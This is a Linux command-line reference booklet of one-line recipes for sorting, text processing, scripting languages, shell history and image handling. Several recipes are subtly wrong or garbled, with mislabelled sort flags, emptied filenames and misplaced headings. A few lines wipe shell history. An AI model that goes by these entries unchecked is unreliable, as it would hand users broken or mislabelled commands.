 cat *.txt | { printf "se te du\nplot '-' t '' w dots\n"; tr '[[:upper:]]' '[[:lower:]]' | tr -s [[:punct:][:space:]] '\n' | sort | uniq -c | sort -nr | head -n 100 | awk '{print $1}END{print "e"}'; } | gnuplot

Analysing Text Data ‹↑›

some less command line switches
-i - when searching within less, ignore case unless the search has uppercase
-I - when searching within less, ignore case
-G - don't highlight matches when searching within less

tools to process text data
awk a very capable text data processing language
perl an even more capable language
cut a simple field based tool
sort sort lines of a text file
www: delimiter
A delimiter is a character which separates two fields, or marks the beginning or end of some data. If we have two numbers separated by a space character, as in '23.2 200', then we say that the data is 'delimited' by spaces.
www: field
A field is a unit of data in a record. If we have data about people, then three fields may be a person's first name, second name and age. However, the way that data is broken up into fields is subjective and often culturally dependent. Therefore there is no universally accepted data format.
www: record
A record is a set of data fields which relate to a particular entity. For example, if we store data about people, then a record will contain the data for one person. The way the record is stored is dependent upon the data format.
www: export
The process of exporting data involves converting data to a particular format and saving it in a file or files.
www: import
Importing data is the reverse process: reading data saved in a particular format into a program.
A small booklet about the awk language, also available as a pdf file.
a booklet about the perl language
The delimiter character for cut can only be a single character, as far as I am aware. If more processing power is needed then the reader should consider using awk, sed, or perl.

show the second "field" of each line with space delimited fields

 cut -d ' ' -f 2 data.txt

If any extra spaces are in the file, this will fail

with space separated fields, first get rid of unwanted spaces with sed

 sed -r 's/^\s+//; s/\s+/ /g' cgt.txt | cut -d' ' -f2
   if the data were
     spain 4 5
     italy 11 5
     england 4 6
   then the output would be
     4
     11
     4
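The recipe can be run end-to-end by first creating the sample data (the file name matches the recipe above; the contents are the invented sample):

```shell
# create the sample data file
printf 'spain 4 5\nitaly 11 5\nengland 4 6\n' > cgt.txt

# normalise the whitespace, then take the second field
sed -r 's/^\s+//; s/\s+/ /g' cgt.txt | cut -d' ' -f2
```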

show every comma delimited field except the second

 cut -d, -f 2 --complement list.txt   '--complement' is a GNU extension

show the 2nd field and all subsequent fields of a comma delimited file

 cut -d, -f2- data.csv

show the 1st, 2nd and 3rd fields

 cut -d, -f-3

show fields 2, 3 and 4

 cut -d, -f2-4

sort alphabetically on the 3rd field of the file ignoring initial blanks

 sort -k 3b

Extracting Data From Text ‹↑›

display all the urls from 'essay.txt' and select to open in browser

 urlview essay.txt

Tidying Text Files ‹↑›

count the duplicated (consecutive) lines in a text file

 uniq -d file.txt | wc -l   this also counts duplicate blank lines

show all duplicated (consecutive) lines in a text file

 uniq -d file.txt

output the file 'paper' with 1 space between words and 2 after fullstops

 fmt -u paper

show the file 'term-paper' with multiple blank lines as only one blank line

 cat -s term-paper

display 'term-paper' with multiple blank lines removed and giving the text unified spacing between words

 cat -s term-paper | fmt -u | less

output the file 'term-paper' with lines up to 75 characters long

 fmt term-paper

output the file 'doc.txt' with lines up to 80 characters long

 fmt -w 80 doc.txt

wrap long lines in the file 'doc.txt' without disturbing special patterns

 par doc.txt

Stream Editing Text Files ‹↑›

'stream editing' or 'batch editing' text files refers to the process of modifying a text file without opening a text editor. In other words the text file is modified via a series of commands which are applied to a file or many files with a program such as sed, awk, perl, etc. This is very useful when a large number of modifications need to be made in many files and where those modifications are similar; for example, where a person's name needs to be changed in a large number of files.

Randomize lines (opposite of | sort)

 random -f <file>

uniq for unsorted data

 awk '!_[$0]++{print}'

Add a line to a file using sudo

 echo "foo bar" | sudo tee -a /path/to/some/file

Remove duplicate entries in the file 'list.txt' without sorting.

 awk '!x[$0]++' list.txt
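For example, with a small invented list, the awk idiom keeps only the first occurrence of each line while preserving the original order:

```shell
# a sample list with repeats (invented contents)
printf 'red\nblue\nred\ngreen\nblue\n' > list.txt

# remove duplicates without sorting
awk '!x[$0]++' list.txt   # prints: red, blue, green (one per line)
```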

Sorting Text Data ‹↑›

The unix 'sort' utility is a powerful and flexible way to reorder lines of a text file based on the data in one or more of the 'fields' of each line. A field is a chunk of text separated from another chunk by a 'delimiter' character such as a space or a colon. For example if the line is 'italy 3 4/oct/1999' and the delimiter is a space then the fields are 'italy', '3' and '4/oct/1999'

By default, sort divides a line into fields based on spaces or tabs but can use another character (see the -t option)

Viewing Help For Sort ‹↑›

view some examples of using the 'sort' program

 info coreutils 'sort invocation'

view a confusing description about how 'sort' works

 man sort   this is a classic example of an accurate but baffling man page

Basic Usage ‹↑›

sort in alphabetical order (abc...) the lines of the text file 'data.txt'

 sort data.txt    the sorted lines are displayed, the file is unchanged

sort in reverse alphabetical order (zxy...) the lines of the file 'data.txt'

 sort -r data.txt

sort in alphabetical order, ignoring case, the lines of the file 'data.txt'

 sort -fr data.txt
 sort -f -r data.txt   the same

sort in alphabetical order using the 3rd 'field' in each line as the sort key

 sort -k3 data.txt  each 'field' is a bit of text separated by spaces
 sort +2 data.txt   prehistoric syntax, probably to be avoided like the bubonic plague

Sort IPV4 ip addresses

 sort -t. -k1,1n -k2,2n -k3,3n -k4,4n
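The per-field numeric keys matter here: a plain alphabetic sort would put 10.0.0.10 before 9.0.0.1. A sketch with made-up addresses:

```shell
# some sample addresses (invented)
printf '10.0.0.2\n9.0.0.1\n10.0.0.10\n' > ips.txt

# sort each dot-separated octet numerically
sort -t. -k1,1n -k2,2n -k3,3n -k4,4n ips.txt
# 9.0.0.1
# 10.0.0.2
# 10.0.0.10
```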

sort lines by length

 perl -lne '$l{$_}=length;END{for(sort{$l{$a}<=>$l{$b}}keys %l){print}}' < /usr/share/dict/words | tail

Sort Inplace ‹↑›

sort a file and update it

 sort -o data.txt data.txt       is this safe??
 sort --output=data.txt data.txt

Sorting By Multiple Fields ‹↑›

The lines of a file can be sorted first by one field, and then by a second field when the value of the 1st field is equal

sort a file alphabetically by the 1st field and then numerically by the 2nd

 sort -k1,1 -k2,2n data.txt   the 'n' applies only to the 2nd key

sort the lines alphabetically using the first 3 fields of the file

 sort -k 1,3 data
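The idea described above — an alphabetic first key with a numeric second key as tie-break — can be seen with a small invented file:

```shell
# sample data: name then a number
printf 'pear 10\napple 5\napple 2\n' > data.txt

# alphabetic on field 1, numeric on field 2 when field 1 is equal
sort -k1,1 -k2,2n data.txt
# apple 2
# apple 5
# pear 10
```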

Numerical Sorts ‹↑›

perform a numerical sort using the second field

 sort -k2,2n data.txt  2,2 means from the 2nd to the 2nd field
 sort -n -k2 data.txt  watch out! this may be different ??

sort lines using the 2nd field as a numeric key with fields delimited by '/'

 sort -n -t/ -k2 data.txt
 sort -n -t'/' -k2 data.txt    the same
 sort -nt/ -k2 data.txt      the same, again

sort in ascending numerical order using the 2nd field as the sorting key

 sort -k 2,2n data   possibly the correct way to do this
 sort -k 2n,2n data  the same
 sort -n -k2 data    this may be subtly different
 sort -nk2 data      options can be written together

sort the lines of 'data' using the 3rd ':' delimited field as a number key

 sort -n -k3 -t: data
 sort -nk3 -t: data       the same
 sort -nk3 -t :  data     the same again
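For instance, with colon-delimited records invented for the example (restricting the key with '-k3,3n' keeps the sort to field 3 only):

```shell
# passwd-style sample records (invented)
printf 'ann:x:1002\nbob:x:1000\ncal:x:1001\n' > users.txt

# numeric sort on the 3rd colon-delimited field
sort -t: -k3,3n users.txt
# bob:x:1000
# cal:x:1001
# ann:x:1002
```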

sort the lines of 'data' in descending (reverse) numeric order

 sort -rn data

sort lines in descending numerical order using the 2nd field as the sort key

 sort -k2 -r -n data.txt
 sort -rnk2 data.txt    the same, but better

sort in ascending numeric order using only the 1st digit of the 2nd field

 sort -nk2.1,2.1 data.txt   '2.1,2.1' means from the 1st to the 1st character of field 2

sort in descending numeric order using the first 3 digits of the 2nd field

 sort -rnk2.1,2.3 data.txt

Sorting By Date Values ‹↑›

The problem of sorting by a date value is somewhat tricky, mainly because of the daunting array of different formats which a date can appear in, without even thinking about intercultural differences. However 'sort' is capable of sorting by date value, where the dates are in a consistent format.

Where the date string is of a variable length the problem gets harder. It may be possible to use the -t delimiter to divide up each field of the date (eg use '-t/' for '1/january/08' and '02/oct/2001')

Use the 'M' modifier to recognise month names and abbreviated month names

sort lines by month name, assuming that field 3 is an english month name

 sort -k3M data  field 3 can be something like 'feb', 'oct' or 'january'

sort by month names using the 3rd character of the 2nd field as the start point

 sort -k2.3M data  field 2 may be '--jan' or '::august' etc

sort lines by the 1st field, a date in the format dd/mm/yyyy (eg '09/11/1922')

 sort -k 1.7n -k 1.4n -k 1.1n data.txt
note that '4/11/1920' will not sort well but '04/11/1920' will
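A sketch of the dd/mm/yyyy sort with two invented, zero-padded dates — the keys pick out year (character 7), month (character 4), then day (character 1):

```shell
# two sample lines, each starting with a dd/mm/yyyy date
printf '02/01/2001 a\n01/02/2000 b\n' > dates.txt

# sort by year, then month, then day
sort -k1.7n -k1.4n -k1.1n dates.txt
# 01/02/2000 b
# 02/01/2001 a
```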

reverse sort lines by a date field in the format dd/mm/yyyy

 sort -k 1.7nr -k 1.4nr -k 1.1nr data.txt

sort lines with the first field a date in format dd/MON/yyyy '02/Apr/2010'

 sort -k 1.8n -k 1.4M -k 1.1n data.txt
the month abbreviations must be 3 letters, and in english ...

sort lines by a date/time value such as '01/Jan/2004:06:31:51'

 sort -k 1.8n -k 1.4M -k 1.1n -k 1.13,1.21 data.txt
this assumes the date is the first field of each line

Fields And Partial Fields ‹↑›

sort lines starting the key at the second character of the 2nd field

 sort -k2.2 data

sort using characters 2 to 8 as the alphabetic sort key

 sort -k2.2,2.8 data

Other Tools ‹↑›

tsort is a mysterious tool: it performs a 'topological sort', ordering items so that each item comes before the items which depend on it


sort text files by the number of lines which they contain, reverse order

 file * | grep text | sed "s/:.*//" | xargs wc -l | sort -rn | grep -v "total$" | less

display the lines in a text file 'shuffled'

 shuf file.txt

shuffle lines in a file and update the file

 shuf -o F < F        according to the man pages, this is safe
 cat F | shuf -o F   the same, no risk of truncation 'apparently'

shuffle some lines entered at the prompt

 shuf <<eof
A man,
a plan,
a canal:
Panama!
eof

shuffle command line arguments

   shuf -e clubs hearts diamonds

display the lines of a file in reverse order

 tac file     yes 'tac' is the reverse of 'cat'

Typesetting Text Documents ‹↑›

This section explains how to prepare documents to be printed on paper. This is actually a really large topic. See also the latex-book.txt file for detailed information about the Latex typesetting system.

related booklets

Overview ‹↑›

This section tries to give an overview of the numerous tools available to produce 'typeset' documents in a format ready to be sent to a printer (such as pdf or postscript).

www: markdown
The user writes a plain text document adhering to certain formatting rules ... and markdown produces a formatted html document
www: halibut
The user embeds simple 'markup' codes into the text document and the tool can convert the document into a variety of output formats including pdf
www: reStructuredText
another markup philosophy similar to markdown
a page about 'restructured text'

Latex ‹↑›

Latex is for people who have 4 years to write a thesis. If you have less time, use enscript or halibut.

see the latex booklet at

convert a latex source file (.tex) into opendocument (.odt)

 htlatex MyFile.tex "xhtml,ooffice" "ooffice/! -cmozhtf" "-coo -cvalidate"

Text Data Formats ‹↑›

store personal contact information in a text file


Xml ‹↑›

www: http://xmlstar.sourceforge.net
The home page for xmlstarlet
more linux xml software
xmlstarlet examples
typesetting tool quick summary
groff an old unix system, used for 'man' pages
latex extensive system widely used for scientific and maths docs
docbook an xml based "super" system
pod the perl document system,
man the old unix "manual page" system based on groff
enscript turns text into pdf in a configurable manner
markdown minimal text markup
pandoc implements and extends markdown, lots of output formats
phpmarkdown a php implementation of markdown

remove comments from xml

 cat <filename> | perl -e '$/ = ""; $_ = <>; s/<!--.*?-->//gs; print;'

remove comments from the xml file 'page.xhtml'

 xmlstarlet ed -d '//comment()' page.xhtml

show some help information for the 'ed' option of xmlstarlet

 xmlstarlet ed -h

display the xml entity for the & ampersand character

 xmlstarlet esc '&'

Count elements matching XPath expression

 xmlstarlet sel -t -v "count(/xml/table/rec/numField)" xml/table.xml

Count all nodes in XML document

 xmlstarlet sel -t -f -o " " -v "count(//node())" xml/table.xml xml/tab-obj.xml

Delete elements matching XPath expression

 xml ed -d /xml/table/rec[@id='2'] xml/table.xml

Generate HTML from given SGML docbook document

 xml tr --omit-decl --docbook /usr/share/sgml/docbook/yelp/docbook/html/docbook.xsl  sgml/docbook1.sgml | xml fo --html --indent-spaces 2

Validate XML document against a DTD

 xml val --dtd dtd/table.dtd xml/tab-obj.xml >/dev/null 2>&1; echo $?

Prettify an XML file

 tidy -xml -i -m [file]

Csv ‹↑›

csv stands for 'comma separated values' and is an old and simple text data format. A simple example of a line in a csv file would be

 "Bob", "Green", 43

Where each of the fields may stand for 'first name', 'second name' and age.

sum all the numbers in the 4th column from a csv data file

 awk -F ',' '{ x = x + $4 } END { print x }' test.csv
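The recipe can be run end-to-end with a tiny invented csv file:

```shell
# sample csv data with numbers in the 4th column
printf 'a,b,c,10\nd,e,f,2.5\n' > test.csv

# sum the 4th comma-delimited column
awk -F ',' '{ x = x + $4 } END { print x }' test.csv   # prints 12.5
```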

turn lines in columns in csv format

 ls | sed -n '1h;2,$H;${g;s/\n/,/g;p}'

convert 'csv' text data files to 'tsv' (tab delimited format)

 sed 's/,/\t/g' report.csv > report.tsv

sum the numbers in the 4th column of a comma-delimited csv file with perl

 perl -F, -lane '$sum += $F[3]; END { print $sum }' file.csv

pretty-print a simple csv file on the command line

 column -s, -t <tmp.csv

parse a quoted .csv file

 awk -F'^"|", "|"$' '{ print $2,$3,$4 }' file.csv

extract the 2nd field of a csv file with 'cut'

 cut -d\" -f2 file.csv
 cut '-d"' -f2 file.csv

Text Oriented Programming Languages ‹↑›

The Awk Language ‹↑›

a tutorial
one line examples of awk
Randomize lines in a file
 awk 'BEGIN{srand()}{print rand(),$0}' SOMEFILE | sort -n | cut -d ' ' -f2-

Print a row of 50 hyphens

 awk 'BEGIN{while (a++<50) s=s "-"; print s}'

Calculating series with awk: add numbers from 1 to 100

 seq 100 | awk '{sum+=$1} END {print sum}'

print file without duplicated lines using awk

 awk '!($0 in a) {a[$0];print}' file

Print line immediately before a matching regex.

 awk '/regex/{print x};{x=$0}'
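For example, with file contents invented for the demonstration:

```shell
# a small sample file
printf 'one\ntwo\nthree\n' > lines.txt

# print the line just before the one matching /three/
awk '/three/{print x};{x=$0}' lines.txt   # prints: two
```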

Grep ‹↑›

Grep is the classic and venerable unix tool for searching for text within files.

count how many times a string appears in a tree of files

 grep -or string path/ | wc -l

permanently let 'grep' colorize its output

 echo alias grep=\'grep --color=auto\' >> ~/.bashrc ; . ~/.bashrc

Search through files, ignoring .svn

 grep <pattern> -R . --exclude-dir='.svn'

Output files without comments or empty lines

 grep -v "^\($\|#\)" <filenames>

Colorize matching string without skipping others

 egrep --color=auto 'usb|' /var/log/messages

find string

 grep -iR find_me ./

Sed Stream Editor ‹↑›

This section provides only a very brief overview of the sed stream editor, attempting to cover only the most common tasks which may be performed with sed. For more information see the booklet 'sed-book.txt'

The official site for sed containing many examples
perform sed substitution on all but the last line of input
 sed -e "$ ! s/$/,/"

replace 'a' with 'A', 'b' with 'B' etc, similar to the 'tr' tool

 sed "y/abcd/ABCD/g"

convert words beginning in 'b' or 'c' to upper case

 sed -r "s/\<(b|c)[a-z]+/\U&/g"
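A quick check of the '\U' upper-casing (GNU sed; the sample text is invented):

```shell
# upper-case words beginning with 'b' or 'c'
echo 'big cats and bears' | sed -r 's/\<(b|c)[a-z]+/\U&/g'
# BIG CATS and BEARS
```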

convert upper case words to lower case

 sed -r "s/\<[[:upper:]]+\>/\L&/g"

match words beginning in 'a' or 'b'

 sed -r "s/\<(a|b)[a-z]+/&/g"

make changes to files and back up to .bak

 sed -i.bak -r "s/yes/no/g" *.txt    GNU sed 4

detailed information about gnu regular expressions (used in sed)

 man 7 regex

delete uppercase letters and commas.

 sed -r 's/[[:upper:],]//g'

Perl ‹↑›

Perl is a language which was originally inspired by unix shell syntax (and by tools such as awk and sed), as well as by the idea of writing terse but powerful programs. Perl initially rose to fame through its suitability for writing web-server cgi scripts, since perl, like the unix shells, uses plain text as a kind of "data interchange format".

This section only provides the briefest of introduction to perl, with an emphasis on using short, one-line programs for carrying out a simple task from the bash-shell.

a command line calculator in perl

 perl -e 'for(@ARGV){s/x/*/g;s/v/sqrt /g;s/\^/**/g};print eval(join("",@ARGV)),$/;'

determine if a regular expression has a valid syntax

 perl -we 'my $regex = eval {qr/.*/}; die "$@" if $@;'

a command which will make perl crash

 perl -e '$x = []; push @$x, eval { $x = 1; return $x = 1; }'

transform the contents of a text file to all uppercase.

 perl -i -pe '$_ = uc $_' file.txt    the file IS changed

print the line numbers of a text file

 perl -ne 'print "$. - $_"' infile.txt

Sort the size usage of a directory tree, labelling the sizes in gigabytes, megabytes and kilobytes

 du -b --max-depth 1 | sort -nr | perl -pe 's{([0-9]+)}{sprintf "%.1f%s", $1>=2**30? ($1/2**30, "G"): $1>=2**20? ($1/2**20, "M"): $1>=2**10? ($1/2**10, "K"): ($1, "")}e'

Perl Documentation ‹↑›

debian: perl-doc - to use the perldoc tool

query the perl "frequently asked questions" documents for a word or phrase

 perldoc -q eval

show the documentation for the CGI module

 perldoc CGI   these names are case-sensitive, "perldoc cgi" doesn't work

Perl One Line Scripts ‹↑›

include 2 perl expressions with the -e expression

 perl -e 'print "Hello";' -e 'print " World\n"'

print the 1st and 2nd fields of the input lines

 echo a b c | perl -lane 'print "@F[0..1]"'

print the 3rd line of a file

 perl -ne 'print if $. == 3' file.txt

display the current week number

 perl -e 'use Date::Calc qw(Today Week_Number); $weekn = Week_Number(Today); print "$weekn\n"'

Perl Modules ‹↑›

Upgrade all perl modules via CPAN

 perl -MCPAN -e 'CPAN::Shell->install(CPAN::Shell->r)'

Upgrade all perl modules via CPAN

 cpan -r

Open Perl module source in your editor

 $EDITOR `perldoc -l Module::Name`

clean up syntax and de-obfuscate perl script

 perl -MO=Deparse script.pl | perltidy   or, from within vim:  :%! perl -MO=Deparse | perltidy

Python ‹↑›

one-liner to display ip addresses

 python -c "import socket; print '\n'.join(socket.gethostbyname_ex(socket.gethostname())[2])"

An easter egg built into python to give you the Zen of Python

 python -c 'import this'

Cleanup Python bytecode files

 find . -name "*.py[co]" -exec rm -f {} \;

Quick syntax highlighting with multiple output formats

 pygmentize -o source.html source.py   the output format is inferred from the file extension

Ruby ‹↑›

Ruby is a language which, along with Python, has become increasingly popular. The 'Ruby on Rails' system is a framework for creating web-applications (complex websites)

Display command lines visible on homepage

 ruby -ropen-uri -e 'require "hpricot";(Hpricot(open(""))/".command").each{| c| puts c.to_plain_text}'

print a row of 50 hyphens

 ruby -e 'puts "-" * 50'

ruby one-liner to get the current week number

 ruby -rdate -e 'p Date.today.cweek'

ruby one-liner to get the current week number

 ruby -e 'require "date"; puts Date.today.cweek'

Php ‹↑›

run php code inline from the command line

 php -r 'echo strtotime("2009/02/13 15:31:30")."\n";'

display information about the php configuration

 php -i

test the php configuration

 php -r 'phpinfo();'

search a folder to check for syntax errors in php files

 find . -name "*.php" -exec php -l {} \;

The C Language ‹↑›

enter and compile a c one line program

 echo -e '#include <stdio.h>\nint main(){printf("c one liners\\n");}' | gcc -x c -o /tmp/oneliner - && /tmp/oneliner

Source Code Files ‹↑›

Viewing Source Code ‹↑›

view a source code file in a pager with some syntax highlighting

 over file.c     over is part of the 'enscript' package; 'file.c' is a placeholder

Formatting And Indenting Source Code ‹↑›

The program 'indent' is designed for c and cpp but can be used for java as well.

format source code

 astyle, indent, bcpp

indent a c file with no brace indent,

 indent -bli0 <file.c The '{' will be directly under the clause

indent 'file.c' but dont put blank lines after procedures

 indent -nbap <file.c

indent using the 'kernighan & ritchie' style (compact)

 indent -kr -st | less

indent 'file.c' without lining up parenthesis (). (prevents large indents)

 cat file.c | indent -kr -nlp -st | less
the 'k & r' style puts the braces on the same line

indent with an indent of 2 spaces, writing to standard output

 indent -gnu --indent-level2  -st | less
the gnu style puts the curly braces underneath the previous line

bli is the brace indent

indent the java code file 'original', with an indent of 2 spaces

 astyle -js2 < original > new
 astyle --mode=java --indent=2 < original > new  the same

Converting To Syntax Highlighted Documents ‹↑›

The following tools can convert source code in a text file to another format, such as HTML, rtf or LaTeX, with the syntax of the source code highlighted for easier reading. For HTML, the tool 'webcpp' seems to produce the nicest looking output (at least with the default settings). All the tools support a number of programming languages for the input code file.

Syntax highlighting tools

www: webcpp outputs only in HTML
www: highlight
outputs formats: ansi latex xterm256 rtf tex xhtml xml svg
www: gnu
source-highlight output formats: HTML, XHTML, LaTeX, Texinfo, ANSI color escape codes and DocBook
www: the
vim editor
www: enscript

convert source code to highlighted html with no <html> <body> tags

 webcpp codefile htmlfile -s

convert 'file' to html, writing to standard out with unix script type

 cat file | webcpp - - -x=sh -s | less

convert java code to html with line numbers and internal css definition

 highlight -i -o -I -l

convert a c file to LaTeX with the syntax highlighted

 highlight -L -i main.cpp -o main.cpp.tex

'highlight' output formats

 LaTeX (-L), XHTML (-X), TeX (-T), RTF (-R), ANSI Escape Quotes(-A), and XML (-Z).

convert a c++ file to html from an input stream and with external css

 highlight < main.cpp > main.cpp.html -Sc

convert chom.c to pretty printed postscript with 2 columns, landscape

 enscript -p -Ec -2 -r -f "Courier8" chom.c
 enscript -p -2rEc -f Courier8 chom.c     the same


convert '' to a syntax highlighted 6 point pdf file

 enscript -o - -2rE -f Courier6 | ps2pdf - Assig.pdf

the enscript options used
-p - output to the file ''
-o - - send the output to standard out
-r - landscape
-2 - two columns
-Ec - syntax highlight with 'c' syntax
-f "Courier8" - use an 8 point courier font

see what computer languages enscript can handle

 enscript --help-pretty-print

Command History ‹↑›

The 'history' file is a special text file which contains all recent commands which have been entered at the command line. This is invaluable to avoid retyping things.

put a time stamp in the command history and store more commands

 export HISTTIMEFORMAT='%Y.%m.%d-%T :: ' HISTFILESIZE=50000 HISTSIZE=50000

This will result in the 'history' command displaying something like

 514  2010.05.12-09:15:26 :: ls -thor
 515  2010.05.12-09:15:50 :: java AssigOne110
 516  2010.05.12-09:16:36 :: ls

A function to display the history and optionally search through it

 h(){ if [ -z "$1" ]; then history; else history | grep "$@"; fi; }; h
 h(){ [ -z "$1" ] && history || history | grep "$@"; }; h

clear your history saved into .bash_history file

 history -c && rm -f ~/.bash_history

clear the history of the current shell session only

 history -c

put an environment variable in the history to edit it (zsh's 'print -s')

 print -s "PATH='$PATH'"

A bit of privacy in .bash_history

 export HISTCONTROL=ignoreboth

List of commands you use most often

 history | awk '{a[$2]++}END{for(i in a){print a[i] " " i}}' | sort -rn | head

find the longest command in your history

 history | perl -lane '$lsize{$_} = scalar(@F); if($longest<$lsize{$_}) { $longest = $lsize{$_}; print "$_"; };' | tail -n1

exit without saving history

 kill -9 $$

See most used commands

 history|awk '{print $2}'|awk 'BEGIN {FS="|"} {print $1}'|sort|uniq -c|sort -r

Avoiding history file to be overwritten

 shopt -s histappend

Add timestamp to history

 export HISTTIMEFORMAT='%F %T '
delete a line from your shell history

 history -d 1234    where 1234 is the entry number shown by 'history'

Text And Character Recognition ‹↑›


The process of extracting text data from an image file (which has usually been obtained by scanning a page of typed text) is known as "ocr" for Optical Character Recognition


Images ‹↑›

A more comprehensive treatment of images on linux
Determine an image's dimensions
 identify -format "%wx%h" /path/to/image.jpg

Convert images (jpg, png, ...) into a big PDF 'big.pdf'

 convert images*.* big.pdf

Recipes ‹↑›

browse the '.gif' images in the '/usr/doc/imagemagick/examples' directory

 display 'vid:/usr/doc/imagemagick/examples/*.gif'

browse through all image files in the current directory

 display 'vid:*'

In the preceding example, only those files with image formats supported by display are read and displayed.

put the image 'tetra.jpeg' in the root window

 display -window root tetra.jpeg

Use zgv to view images in a virtual console (not in X).

browse the images in the current directory

 zgv

browse the images in the '/usr/share/gimp/scripts' directory

 zgv /usr/share/gimp/scripts

Use the arrow keys to navigate through the file display; the red border indicates the currently selected file.

view the file '/usr/share/images/mondrian-15.jpeg' via a 'file:' URL

 file:/usr/share/images/mondrian-15.jpeg

Notice that the given file: URL only has one preceding slash, pointing to the root directory, and not two, as in http://.

browse the images on the PhotoCD disc mounted on '/cdrom'

 xpcd /cdrom
The preceding example will open two new windows -- a small xpcd command bar window, and a larger window containing thumbnails of all PhotoCD images on the disc.

view the PhotoCD file 'driveby-001.pcd'

 xpcd driveby-001.pcd
NOTE: You can also use display to view a '.pcd' PhotoCD image file.

resize 'phoenix.jpeg' to 480x320 pixels

 mogrify -geometry 480x320 phoenix.jpeg
This transforms the original 'phoenix.jpeg' file in place.

resize 'phoenix.jpeg' to exactly 480x320 pixels, regardless of aspect ratio

 mogrify -geometry 480x320! phoenix.jpeg
the '!' forces the exact size, ignoring the aspect ratio

increase the height of 'phoenix.jpeg' by 25 percent and decrease its width by 50 percent

 mogrify -geometry 125%x50% phoenix.jpeg

rotate 'phoenix.jpeg', whose height exceeds its width, by 90 degrees

 mogrify -rotate '90<' phoenix.jpeg

reduce the colors in 'phoenix.jpeg' to two

 mogrify -colors 2 phoenix.jpeg

reduce the colors in 'phoenix.jpeg' to four and apply Floyd-Steinberg error diffusion

 mogrify -colors 4 -dither phoenix.jpeg

change the colors in the file 'rainbow.jpeg' to those used in the file 'prism.jpeg'

 mogrify -map prism.jpeg rainbow.jpeg
Use the '-monochrome' option to make a color image black and white.

make the color image 'rainbow.jpeg' black and white

 mogrify -monochrome rainbow.jpeg

If you have a PPM file, use ppmquant to quantize, or reduce to a specified quantity, the colors in the image -- see the ppmquant man page

set the gamma correction of the image 'rainbow.jpeg' to .8, type:

 mogrify -gamma .8 rainbow.jpeg

annotate the image file 'phoenix.jpeg' with a comment, type (all on one line):

 mogrify -comment "If you can read this, you're too close!" phoenix.jpeg

You won't see the annotation when you view the image; it is added to the image file itself.

read any comments made in the image file 'phoenix.jpeg'

 rdjpgcom phoenix.jpeg

add a border two pixels wide and four pixels high to 'phoenix.jpeg'

 mogrify -border 2x4 phoenix.jpeg

add a decorative frame eight pixels wide and eight pixels high to 'phoenix.jpeg'

 mogrify -frame 8x8 phoenix.jpeg

create a montage from the files 'owl.jpeg', 'thrush.jpeg', and 'warbler.jpeg' and write it to 'endangered-birds.png'

 montage owl.jpeg thrush.jpeg warbler.jpeg endangered-birds.png

NOTE: In this example, three JPEGs were read and output to a PNG file; the output format is taken from the file extension.

combine two images, 'ashes.jpeg' and 'phoenix.jpeg', into a new file 'picture.jpeg'

 combine ashes.jpeg phoenix.jpeg picture.jpeg

You can specify the percentage to blend two images together with the '-blend' option.

combine the image files 'phoenix.jpeg' and 'ashes.jpeg' so that the blended image contains 70 percent of the second image

 combine -blend 70 ashes.jpeg phoenix.jpeg picture.jpeg

This command combines the two images and writes a new image file, 'picture.jpeg'.

make a morphed image of the files 'ashes.jpeg' and 'phoenix.jpeg', and write it to 'picture.jpeg'

 combine -compose difference ashes.jpeg phoenix.jpeg picture.jpeg

convert the JPEG file 'phoenix.jpeg' to a PNG image

 convert phoenix.jpeg phoenix.png
This command converts the JPEG image 'phoenix.jpeg' to PNG format and writes it to a new file, 'phoenix.png'.

convert the PNM file 'pike.pnm' to non-interlaced JPEG while sharpening the image by 50 percent and adding both a 2x2 border and a copyright comment

 convert -interlace NONE -sharpen 50 -border 2x2 -comment "Copyright" pike.pnm pike.jpeg
the comment text here is just an example

list available scanner devices

 scanimage --list-devices

device 'umax:/dev/sgb' is a UMAX Astra 1220S flatbed scanner

list available options supported by the device listed in the previous example

 scanimage --help -d 'umax:/dev/sgb'

NOTE: For all scanimage commands, specify the scanner device you want to use with the '-d' option.

test the UMAX scanner listed previously

 scanimage --test -d 'umax:/dev/sgb'

Debian: 'netpbm'

make a 72 dpi scan of a color image 200 pixels wide and 100 pixels tall, using the UMAX scanner from previous examples, and writing to a file called 'scan.ppm'

 scanimage -d umax:/dev/sgb --resolution 72 -x 200 -y 100 > scan.ppm

make a 300 dpi scan of a black and white image 180 pixels wide and 225 pixels tall, using the UMAX scanner from previous examples, and writing to a file called 'scan.pbm'

 scanimage -d umax:/dev/sgb --resolution 300 --mode lineart -x 180 -y 225 > scan.pbm
(all on one line)

extract the highest resolution from the file 'slack.pcd' and save it to a PPM file named 'slack.ppm'

 pcdtoppm -r5 slack.pcd slack.ppm

convert the file 'slack.ppm' to non-interlaced JPEG, sharpen the image, add a two-pixel by two-pixel border, and annotate the image, type (all on one line):

 convert -interlace NONE -sharpen 50 -border 2x2 -comment "your comment text" slack.ppm slack.jpeg

remove the "green haze" from a PhotoCD image, do the following:

 First, open the extracted image in the GIMP (see Editing Images with the
 GIMP). Then, click through the Image menu to the Colors submenu and
 adjust the colour balance until the green cast is gone.

Managing Images ‹↑›

find all image files in the 'icons' folder

 find /usr/share/icons/ | xargs file | grep image | less

find all image files on the computer

 sudo find / | xargs file | grep ' image' | less

Viewing Images ‹↑›

ocr tools
tesseract-ocr - command line OCR tool, said to be mature
ocropus - google-sponsored OCR tool, uses tesseract
gocr - an open-source command line OCR program
ocrad - the GNU OCR program
clara - a cooperative OCR system with a graphical interface
unpaper - improve the quality of scanned text images

show jpegs with thumbnails

 find ~ -name '*.jpg' | xargs mirage

Feh ‹↑›

Feh is a fast, command-line driven image viewer; maybe just what we need.

show all the images in the /opt/images tree in a slideshow.

 feh -r /opt/images

same again, but sort by image name before showing.

 feh -rSname /opt/images

create a montage from the images in /opt/images/landscapes

 feh -m /opt/images/landscapes

Create a montage from the images in /opt/images/landscapes and all directories below it. Limit the width of the image to 400 and make the thumbnails 30x20, ignoring aspect ratio

 feh -Xrm -W 400 --thumb-width 30 --thumb-height 20 ./landscapes

view jpgs and gifs with thumbnails

 find ~ -name '*.jpg' -o -name '*.gif' | xargs gthumb

open all images specified in the text file 'images.txt' (one per line)

 qiv -F images.txt
 qiv --file images.txt

display all jpg and gif images shrinking to fit them in the window

 find ~ -name '*.jpg' -o -name '*.gif' | xargs qiv -t

browse through all "gif" images in the current folder "gallery" style

 display 'vid:*.gif'

Image Metadata ‹↑›

Remove EXIF data from images with progress

 i=0; f=$(find . -type f -iname '*.jpg'); c=$(echo "$f" | wc -l); for x in $f; do i=$((i + 1)); echo "$x ($i of $c)"; mogrify -strip "$x"; done

Screenshots ‹↑›

linux image viewers
xv - an old X Window System viewer
